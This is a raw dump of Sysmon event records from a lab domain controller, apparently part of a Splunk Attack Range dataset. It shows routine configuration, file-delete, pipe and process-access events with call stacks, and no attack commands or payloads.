16341600x80000000000000001Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local2021-03-31 11:59:51.105c:\Program Files\ansible\AttackRangeSysmon.xmlSHA256=19DC8D9827AD6ED2FC4D2E4696C6C2EE28D2EF264911B4FEEFC69502E807F031 23542300x800000000000000038Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:52.715{266CAFBE-641B-6064-3202-00000000AD01}5032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=94AF41A42A6C8735FE0054B749CF2B6A,SHA256=4C805619C163C2B26C14BF10FC66FCEF400CD59DEA55C2E86BB12FCF1C5315D5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000037Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:52.715{266CAFBE-641B-6064-3202-00000000AD01}5032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=FDCF19D5594D7C1A5F45871D517F033F,SHA256=700C3D2D4EB2372B5E20B4D75889F0824BA3C3CDBE33683108CF15AA35001C0A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000036Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
11:59:52.449{266CAFBE-62DD-6064-1400-00000000AD01}13401756C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\cryptsvc.dll+6124|c:\windows\system32\cryptsvc.dll+5e34|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000035Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:52.418{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000034Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
11:59:52.418{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000033Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:52.418{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000032Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
11:59:52.418{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000031Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:52.418{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 17141700x800000000000000030Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-CreatePipe2021-03-31 
11:59:52.418{266CAFBE-62DD-6064-1000-00000000AD01}1144\PIPE_EVENTROOT\CIMV2SCM EVENT PROVIDERC:\Windows\system32\svchost.exe 10341000x800000000000000029Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:52.418{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000028Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
11:59:52.418{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000027Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:52.418{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000026Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
11:59:52.418{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000025Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:52.418{266CAFBE-62DA-6064-0B00-00000000AD01}856584C:\Windows\system32\lsass.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000024Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
11:59:52.418{266CAFBE-62DA-6064-0B00-00000000AD01}856584C:\Windows\system32\lsass.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000023Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:52.402{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000022Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
11:59:52.402{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000021Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:52.402{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000020Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
11:59:52.402{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000019Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:52.402{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000018Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
11:59:52.402{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000017Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:52.402{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000016Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
11:59:52.402{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000015Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:52.402{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000014Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
11:59:52.402{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000013Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:52.402{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000012Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
